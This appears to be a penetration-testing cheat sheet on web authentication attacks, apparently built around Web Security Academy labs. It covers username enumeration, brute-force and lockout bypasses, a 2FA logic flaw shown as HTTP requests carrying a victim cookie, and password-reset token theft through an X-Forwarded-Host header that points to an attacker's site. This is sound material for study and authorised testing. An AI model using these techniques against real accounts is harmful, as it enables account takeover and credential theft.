# Authentication

## <mark style="color:purple;">Usernames enumeration</mark>

Test in every features that interact with user account. E.g. login, password recovery.

<mark style="color:purple;">⟩</mark> **Default username**

```
admin
administrator
firstname.lastname@somecompany.com
```

<mark style="color:purple;">⟩</mark> **Regisitration form**&#x20;

Create account and see if there's error like "account already exists".

<mark style="color:purple;">⟩</mark> **Comparing responses**

Use a valid user and an invalid user (and incorrect password). One character out of place makes the messages distinct, even if not visible on the page.

{% hint style="success" %}
**Tip**: Use "Grep - match" in Burp Intruder to fetch the error message
{% endhint %}

<mark style="color:purple;">⟩</mark> **Account locking**

Try 3/5 login. If the account is locked, it could mean that there is.

<mark style="color:purple;">⟩</mark> **Response times**

A website may only check the password if the username is valid. So, entering an excessively long password causes a noticeable delay.

## <mark style="color:purple;">Passwords</mark>

[password-cracking.md](../../iv-miscellaneous/password-cracking.md "mention")

## <mark style="color:purple;">Account locking</mark>

**Guess password with locked account**&#x20;

With your account locked, send a request with an incorrect password and another with a correct password. Is the response different?

***

**IP blocked bypass**

* The failed attempts counter resets if the IP owner logs in successfully. (Make sure that concurrent requests is set to 1)&#x20;
* Try to bypass by adding `X-Forwarded-For` header

***

**With password change**

See if you can change the password of an arbitrary user. E.g: look for a hidden username paramer (control it).  Brute-force password when you enter your current password.

{% hint style="success" %}
**Tip**: use your account and notice different behavior.

* current password: wrong, new-password-1=XXX, new-password-2=XXX
* current password: wrong, new-password-1=XXX, new-password-2=YYY
* current password: \<right>, new-password-1=XXX, new-password-2=XXX
* current password: \<right>, new-password-1=XXX, new-password-2=YYY
{% endhint %}

## <mark style="color:purple;">2FA</mark> <a href="#bypassing-two-factor-authentication" id="bypassing-two-factor-authentication"></a>

* **Brute-force OTP**
* **Bypassing two-factor authentication**&#x20;

Check if you can directly skip to "logged-in" pages.

* **Flawed logic**

<pre class="language-http"><code class="lang-http"><strong># 1 step - (REQUEST) Normal login with attacker account
</strong>POST /login-steps/first HTTP/1.1
Host: vulnerable-website.com
[...]

username=attacker&#x26;password=qwerty
</code></pre>

```http
# 1 step - (RESPONSE) The server sets cookie
HTTP/1.1 200 OK
Set-Cookie: account=attacker
```

```http
# 2 step - request two-factor
GET /login-steps/second HTTP/1.1
Cookie: account=attacker
```

```http
# 3 step - submit the two-factor code with victim cookie
POST /login-steps/second HTTP/1.1
Host: vulnerable-website.com
Cookie: account=victim-user
[...]

verification-code=123456
```

## <mark style="color:purple;">Remember me option</mark>

* **Study your cookie and deduce how it is generated -** Sometimes this cookie is hashed or encoded (e.g. base64)
* **Brute-force other users' cookies to gain access to their accounts**

## <mark style="color:purple;">Password reset</mark>

**Control username parameter**

After you receive an email with the URL to reset your password, see if you can control username parameter.

```http
POST /forgot-pwd?temp-token=xxx HTTP/2
[...]

user=<victim>&new-pwd-1=<whatever>&new-pwd-2=<whatever>&token=xxx
```

***

**Resetting passwords using a URL (static token)**

Poor implementation can use guessable parameter: E.g.: `http://vulnerable-website.com/reset-password?user=victim-user`

***

**Steal another user's token (for dynamic token)**

Add the `X-Forwarded-Host` header and see if it allows you to control the link generated by the app. This way, you can insert your website's URL so that when the user clicks on the link, they are directed to `http://your.website.com/reset-password?token=impredictabletoken`.

```http
POST /forgot-password HTTP/2
Host: 0ad400fb039bb5ea816cac4d00be00a8.web-security-academy.net
X-Forwarded-Host: your.website.com

username=lebron
```
